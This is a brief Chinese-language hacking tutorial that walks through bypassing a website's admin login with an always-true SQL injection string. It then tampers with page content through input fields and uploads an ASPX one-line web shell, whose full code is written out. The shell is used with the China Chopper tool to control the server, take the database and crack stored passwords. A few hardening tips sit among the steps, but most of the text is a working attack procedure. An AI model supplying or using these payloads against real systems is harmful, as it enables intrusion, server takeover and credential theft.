操作
1.网站后台绕过
利用漏洞
例:用户名’or 1=1 or’
2.篡改页面内容
1、在网站前台或后台中寻找能够提交信息的合适位置。2、提交代码,观察效果。
提示:
1、后台网址避免使用常见名称,防止被轻易猜到
2、管理员账号避免使用默认账号如admin、administrator、root、sa等,管理员密码避免使用弱口令如admin、123456、qwerty等
3、构造符合语法规则的永真sql绕过登陆验证,利用单引号’闭合确保语法正确,然后构造1=1等永真判断
4、用户可以提交信息的地方往往存在风险
5、所有问题的根源在于软件开发过程中没有进行充分的特殊字符过滤
3.上传后门程序并控制主机
一句话木马的使用
1、新建文本文档,将文件后缀修改为aspx,书写内容如下:<%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
2、在系统中寻找文件上传点。
3、上传之前创建的aspx一句话木马文件。
4、设法获得上传文件在网站目录中的文件名称和路径。
5、利用中国菜刀工具连接一句话木马(密码为pass)。
6、获得目标服务器的操作权限并拿到数据库文件。
7、对数据库中的账号密码进行解密。